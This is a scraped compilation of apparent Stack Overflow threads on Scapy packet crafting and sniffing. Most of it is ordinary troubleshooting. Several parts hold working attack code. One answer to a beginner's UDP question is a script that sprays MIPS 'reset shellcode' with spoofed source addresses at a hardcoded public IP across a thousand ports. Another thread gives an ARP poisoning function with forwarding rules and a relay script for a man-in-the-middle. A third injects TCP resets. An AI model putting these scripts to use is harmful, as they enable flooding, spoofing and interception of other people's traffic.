I made a simple program that tries to send a UDP packet to my ncat server
here is the code:
from scapy.all import *
sr1(IP(dst="127.0.0.1")/UDP(dport=8080)/"TAG1")
but I get nothing from my ncat server, can someone please tell me what I am doing wrong?
when developing a network related project, i suggest you install capturing software like tcpdump or wireshark. It hepls you to see what is in the network.
To get all packets to 127.0.0.1 using tcpdump, you may use following command:
tcpdump -i eth0 "dst 127.0.0.1 and dst port 8080"
Try this
from scapy.all import *
print("Remote UDP Mips Fuzzer - Reset Shellcode")
for num in range(0,10):
data = "00" * int(str(num))
sc = "3c06432134c6fedc3c05281234a519693c04fee13484dead24020ff80101010c"
a = data+sc
for ip in range(0,255):
for port in range(0,1000):
i=IP()
i.dst="213.48.152.128" #Change this
i.src="10.0"+"."+str(ip)+"."+str(ip)
udp=UDP()
udp.sport=int(str(port))
udp.dport=int(str(port))
sendp(i/udp/a)
See how it works ?
Related
I wanted to make a "proxy" while ARP poisoning, it works with UDP and if I send a pkt to google I see it on my pc using wireshark
def trick(gate_mac, victim_mac):
'''Tricks the victim and the gate_way, using arp'''
my_mac=ARP()
my_mac=my_mac.hwsrc
sendp(Ether(dst=ETHER_BROADCAST)/ARP(pdst= victim_ip, psrc = gate_ip, hwdst= victim_mac))
sendp(Ether(dst=ETHER_BROADCAST)/ARP(pdst= gate_ip, psrc = victim_ip, hwdst= my_mac))
print "TRICKED"
that is the function i wrote to arp poison, now I want to send all the packets I get from the victim's pc to the router/
but I have no clue how to do packet forwarding.
You can simply activate your OS packet forwarding. If you're running Linux, a simple sysctl -w net.ipv4.ip_forward=1 should do that.
You may also need to let the packets pass your firewall;something like iptables -A FORWARD -s victim_ip -j ACCEPT; iptables -A FORWARD -d victim_ip -j ACCEPT should work (if you're using Linux, again).
Under other OSes, you need to find out how to enable packet forwarding and if needed add firewall rules. If you cannot enable packet forwarding, you can run another Scapy script to forward packets for you. Here is an example:
VICTIM_MAC = "00:01:23:45:67:89"
GATEWAY_MAC = "00:98:76:54:32:10"
_SRC_DST = {
GATEWAY_MAC: VICTIM_MAC,
VICTIM_MAC: GATEWAY_MAC,
}
def forward_pkt(pkt):
pkt[Ether].dst = _SRC_DST.get(pkt[Ether].src, GATEWAY_MAC)
sendp(dst)
sniff(
prn=forward_pkt,
filter="ip and (ether src %s or ether src %s)" % (VICTIM_MAC,
GATEWAY_MAC)
)
I used SCAPY to write a program deployed in the WEB server and would like to send TCP RST using SCAPY to block some specific HTTP client access.
After running the program, the client uses Telnet to connect to the server WEB listening port can be SCAPY program interrupt, but the use of browser access can not interrupt. Why is it so?
The code is as follows:
# coding: utf-8
# web server : 10.28.16.20 ;
# http client : 10.28.1.70;
from scapy.all import *
def pkgs(pkg):
if pkg.getlayer(TCP) and pkg[IP].dst=="10.28.16.20" and "10.28.1.70" in pkg[IP].src:
resp=IP(dst=pkg[IP].src,src=pkg[IP].dst)/TCP(dport=pkg[TCP].sport,sport=pkg[TCP].dport,flags="RA",seq=pkg[TCP].ack,ack=pkg[TCP].seq+(len(pkg[TCP].payload) if pkg.getlayer(Raw) else 1))
send(resp,count=2,verbose=0)
if __name__=="__main__":
conf.L3socket=L3RawSocket
sniff(filter="tcp",prn=pkgs,store=0)
Program code screenshot
I think the best way is to get into "Scapy"
then paste that code and enter:
#!/usr/bin/python
from scapy.all import *
ip = IP(src="10.28.16.20", dst="10.28.1.70")
tcp = TCP(sport=80, dport=####, flags=####, seq=####, ack=####)
pkt = ip/tcp
ls(pkt)
send(pkt,verbose=0)
You need to change dport to the source port from the PC, flags to the action you want to do, seq&ack follow the packets you started from.
I have solved it.import threading.
If i try and send a UDP packet with python using scapy
from scapy.all import *
data= "hello"
a = IP(dst="192.168.192.145")/UDP(dport=1194)/Raw(load=data)
send(a)
a.show()
It shows as both malformed and as the DNS protocol in wireshark
Where am I going wrong?
I figured this out by setting my source port to 50000
Sorry, I must be missing something, just adapting a very simple script :
from scapy.all import *
def packet_callback(packet):
if packet[TCP].payload:
print '[*] Source : %s || Destination: %s' % (packet[IP].src,packet[IP].dst)
hexdump(packet[TCP].payload)
sniff(filter="tcp port 80 and host 10.0.0.21", prn=packet_callback, store=0)
This shows HTTP packets content from a specified host, but only incoming ones. If I adapt the IP to mine, I can see all of them.
This is a wireless interface I am listening on. Interface is in monitor mode, using tcpdump I can see all packets from everyone.
System is Linux Mint 17.
Any hint greatly appreciated.
tcmpdump can view all the multicast traffic to specific group and port on eth2, but my Python program cannot. The Python program, running on Ubuntu 12.04:
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
# Multicast port is 52122
sock.bind(('', 52122))
# Interface eth2 IP is 1.2.3.4, multicast group is 6.7.8.9
mreq = socket.inet_aton('6.7.8.9')+socket.inet_aton('1.2.3.4')
sock.setsockopt(socket.IPPROTO_IP, socket.IP_ADD_MEMBERSHIP, mreq)
while True:
print '\nwaiting to receive message'
data, address = sock.recvfrom(1024)
print data
When I use another program to send a multicast packet to eth2, it works and prints the packet. But it fails to see all the current multicast traffic. If I run tcpdump on eth2 on the same port and group as the above program:
sudo tcpdump -i eth2 host 6.7.8.9 and port 52122
it sees both the packets I send from another program AND all the current multicast traffic. It's output looks likes this...
# Packet sent from my other program
09:52:51.952714 IP 1.2.3.4.57940 > 6.7.8.9.52122: UDP, length 19
# Packet send from the outside world
09:52:52.143339 IP 9.9.9.9.39295 > 6.7.8.9.52122: UDP, length 62
Why can't my program see the packets from the outside world? How can I modify it (or something else) to fix this?
Edit:
I should have mentioned, the interface this going over is not eth2 but eth2.200 a VLAN. (The local IP and the tcpdump commands are all run with eth2.200, I just changed that in this question to make it simpler.) Based on this answer that could be the problem?
Edit #2:
netstat -ng when the program is running shows eth2.200 subscribed to 224.0.0.1 and 6.7.8.9`.
tshark -i eth2.200 igmp shows three repeated 1.2.3.4 -> 6.7.8.9 IGMP 46 V2 Membership Report / Join group 6.7.8.9 when the program first starts. When the program process is killed, it shows 1.2.3.4 -> 224.0.0.2 IGMP 46 V2 Leave group 6.7.8.9. There is also an infrequent 1.2.3.1 -> 224.0.0.1 IGMP 60 V2 Membership Query, general, where 1.2.3.1 is 1.2.3.4's gateway.
Not sure if it will help, but the routing table looks like:
Destination Gateway Genmask Flags MSS Window irtt Iface
0.0.0.0 1.2.5.6 0.0.0.0 UG 0 0 0 eth1
1.2.3.0 0.0.0.0 255.255.255.240 U 0 0 0 eth2.200
Thank you!
Finally! Found this question on ServerFault that addresses the same thing. Basically the kernel was not forwarding on / was filtering out the packets because it thought the sourced address was spoofed.
Changed the settings in /etc/sysctl.conf to match:
net.ipv4.conf.default.rp_filter = 0
net.ipv4.conf.all.rp_filter = 0
net.ipv4.ip_forward = 1
Rebooted and everything works.